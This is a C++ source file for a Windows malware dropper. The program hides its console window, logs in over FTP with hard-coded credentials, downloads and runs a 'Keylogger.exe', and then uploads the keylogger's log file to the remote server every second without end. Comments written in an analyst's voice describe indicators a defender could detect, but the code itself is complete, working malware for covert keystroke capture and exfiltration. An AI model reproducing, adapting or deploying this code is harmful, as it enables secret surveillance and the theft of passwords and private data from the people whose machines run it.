#include <Windows.h>
#include <Wininet.h>
#include <time.h>
#include <cstdlib>
#include <iostream>
#include <string>
#include <fstream>
#pragma comment(lib, "wininet.lib")
#pragma comment(lib, "user32.lib")
using namespace std;
bool verb = true; // Verbose mode: when true, main writes progress messages to err_log
// Diagnostic log stream. It is a global object, so the file is created when the
// program starts; the relative name resolves against the working directory.
ofstream err_log("RandomFile");
// Local file name that main passes to PutResults after its upload loop. The
// placeholder text suggests it is meant to match the err_log file name.
LPCTSTR log_results = "SameNameAsAbove";
// Hard-coded FTP endpoint and credentials used by both GetKeylogger and PutResults.
// They are plain string literals, so they can be recovered from the compiled
// binary, and FTP sends the user name and password unencrypted on the wire.
// The values on this page are placeholders.
LPCTSTR ftp = "ftp.randomWeb.com";
LPCTSTR ftp_user = "randomuserName";
LPCTSTR ftp_pass = "randomPassword";
// Remote file that GetKeylogger requests from the server.
LPCTSTR remoteFile = "FileNameOnMaster";
// Local path that GetKeylogger writes the downloaded bytes to.
LPCTSTR newFile = "FileNameOnSlave";
// Local file that main uploads repeatedly through PutResults.
LPCTSTR logfile = "KeyloggerTextFile";
// Downloads `remoteFile` from the FTP server `ftp` and writes it to the local
// path `newFile` in binary mode.
//
// Returns true when FtpOpenFile succeeded, the local file could be opened and no
// InternetReadFile call reported failure; returns false otherwise. Failures are
// written to err_log.
//
// What an analyst can expect to observe from this function: an outbound
// passive-mode FTP login on the default FTP port with the hard-coded credentials,
// a binary retrieval of `remoteFile`, and a new file written at `newFile`.
//
// NOTE(review): the results of InternetOpen and InternetConnect are not checked,
// and only hTransfer is closed in this function.
bool GetKeylogger()
{
DWORD error = 0;
// Initialization for WinInet Functions
// Optional proxy info is left out
// INTERNET_OPEN_TYPE_DIRECT: no proxy is used for this session.
HINTERNET hInternet = InternetOpen(NULL,
INTERNET_OPEN_TYPE_DIRECT,
NULL,
NULL,
0);
// Starts a session, in this case an FTP session in passive mode, authenticating
// with the hard-coded ftp_user / ftp_pass.
HINTERNET hFtpSession = InternetConnect(hInternet,
ftp,
INTERNET_DEFAULT_FTP_PORT,
ftp_user, ftp_pass,
INTERNET_SERVICE_FTP,
INTERNET_FLAG_PASSIVE,
NULL);
/* Open the remote file for reading as a binary transfer */
HINTERNET hTransfer = FtpOpenFile(hFtpSession,
remoteFile,
GENERIC_READ,
FTP_TRANSFER_TYPE_BINARY,
0);
if (hTransfer)
{
// Copy the remote file to disk in chunks of up to SIZE bytes
ofstream out(newFile, std::ios::binary);
if (out.is_open())
{
static const DWORD SIZE = 1024;
BYTE data[SIZE];
DWORD size = 0;
do
{
BOOL result = InternetReadFile(hTransfer, data, SIZE, &size);
if (result == FALSE)
{
error = GetLastError();
err_log << "InternetReadFile error: " << error << endl;
}
out.write((const char*)data, size);
// Stop on the first read error or when a read returns zero bytes.
} while ((error == ERROR_SUCCESS) && (size > 0));
out.close();
}
else
{
// The local output file could not be opened; nothing was transferred
err_log << "Could not open " << newFile;
error = ERROR_FILE_NOT_FOUND;
}
// Close the FTP Handle
const BOOL result = InternetCloseHandle(hTransfer);
if (result == FALSE)
{
// This `error` shadows the outer one, so a failed close is logged but does
// not change the return value.
const DWORD error = GetLastError();
err_log << "InternetClose error: " << error << endl;
}
/* Check error status of the process */
return (error == ERROR_SUCCESS);
}
// Reached only when FtpOpenFile returned NULL: log WinInet's extended response
// text for the failed request and report failure.
DWORD dwInetError, dwExtLength = 1000;
TCHAR *szExtErrMsg = NULL, errmsg[1000];
szExtErrMsg = errmsg;
int returned = InternetGetLastResponseInfo(&dwInetError, szExtErrMsg, &dwExtLength);
err_log << "dwInetError: " << dwInetError << "\nReturned: " << returned << endl;
err_log << "Buffer: " << szExtErrMsg << endl;
err_log << "FtpGetFileError" << endl;
return false;
}
// Uploads the local file `log_results` to the FTP server `ftp`, storing it under
// the remote name `newLog`, as an ASCII-mode transfer.
//
// Parameters:
//   newLog      - name the file is given on the server.
//   log_results - local file to send; this parameter shadows the global of the
//                 same name.
//
// The outcome is written to err_log. The function returns false on every path,
// so the return value does not say whether the upload succeeded.
//
// Each call opens its own WinInet session and FTP login with the hard-coded
// credentials, so every upload appears on the network as a separate FTP session.
bool PutResults(LPCTSTR newLog, LPCTSTR log_results)
{
DWORD error = 0;
// Initialization for WinInet Functions
// Optional proxy info is left out
// INTERNET_OPEN_TYPE_PRECONFIG: proxy settings are taken from the system
// configuration.
HINTERNET hInternet = InternetOpen(NULL,
INTERNET_OPEN_TYPE_PRECONFIG,
NULL,
NULL,
0);
// Starts a session, in this case an FTP session. The flags argument is NULL (0),
// so INTERNET_FLAG_PASSIVE is not requested here.
HINTERNET hFtpSession = InternetConnect(hInternet,
ftp,
INTERNET_DEFAULT_FTP_PORT,
ftp_user, ftp_pass,
INTERNET_SERVICE_FTP,
NULL,
NULL);
/* Send the local file log_results to the server under the name newLog */
if(FtpPutFile(hFtpSession,
log_results,
newLog,
FTP_TRANSFER_TYPE_ASCII,
0))
{
err_log << "File copied." << endl;
}
else
{
// Upload failed: log WinInet's extended response text for the request.
err_log << "File not copied." << endl;
DWORD dwInetError;
DWORD dwExtLength = 1000;
TCHAR *szExtErrMsg = NULL;
TCHAR errmsg[1000];
szExtErrMsg = errmsg;
int returned = InternetGetLastResponseInfo(&dwInetError, szExtErrMsg, &dwExtLength);
err_log << "dwInetError: " << dwInetError << "\nReturned: " << returned << endl;
err_log << "Buffer: " << szExtErrMsg << endl;
err_log << "FtpGetFileError" << endl;
}
InternetCloseHandle(hInternet);
InternetCloseHandle(hFtpSession);
return false;
}
// Entry point: hides the console window, downloads a file over FTP with
// GetKeylogger, runs "Keylogger.exe" through system() if the download succeeded,
// then uploads `logfile` in a loop with a one-second pause between uploads.
//
// Behaviour a defender can key on, all visible in this function:
//   - a console window that is allocated and immediately hidden;
//   - a child process started via system(), which goes through the command
//     interpreter, so the process tree shows the interpreter between this
//     program and Keylogger.exe;
//   - a diagnostic log written through err_log;
//   - one FTP download followed by a steady series of FTP uploads to the same
//     host, each upload being its own session.
int main()
{
// Hide the program's console window: allocate a console, look it up by its
// window class, and hide it (0 is SW_HIDE).
HWND stealth;
AllocConsole();
stealth = FindWindowA("ConsoleWindowClass", NULL);
ShowWindow(stealth, 0);
// Start logs: capture the start time once and format it as text
time_t result = time(0);
char str[26];
ctime_s(str, sizeof str, &result);
if(verb) err_log << "Started logging: " << str << endl;
// Download malware
if (verb) err_log << "Downloading Keylogger.exe with FTP." << endl;
bool success = GetKeylogger();
// Execute malware (only when the download reported success)
if (success)
{
if (verb) err_log << "Executing Keylogger.exe" << endl;
system("Keylogger.exe");
}
// Upload loop. n starts at 0 and is pre-incremented, so the condition stays
// non-zero on every iteration short of integer overflow; the statements after
// the loop are not reached in practice.
int n = 0;
while (++n)
{
if (verb) err_log << "Sending logfile #" << n << "." << endl;
// Formats `result`, the start time captured above, and uses that text as the
// remote file name for this upload.
ctime_s(str, sizeof str, &result);
PutResults(str, logfile);
Sleep(1000);
}
// Final step as written: upload the file named by log_results.
if (verb) err_log << "Finished." << endl;
Sleep(1000);
ctime_s(str, sizeof str, &result);
PutResults(str, log_results);
return 0;
}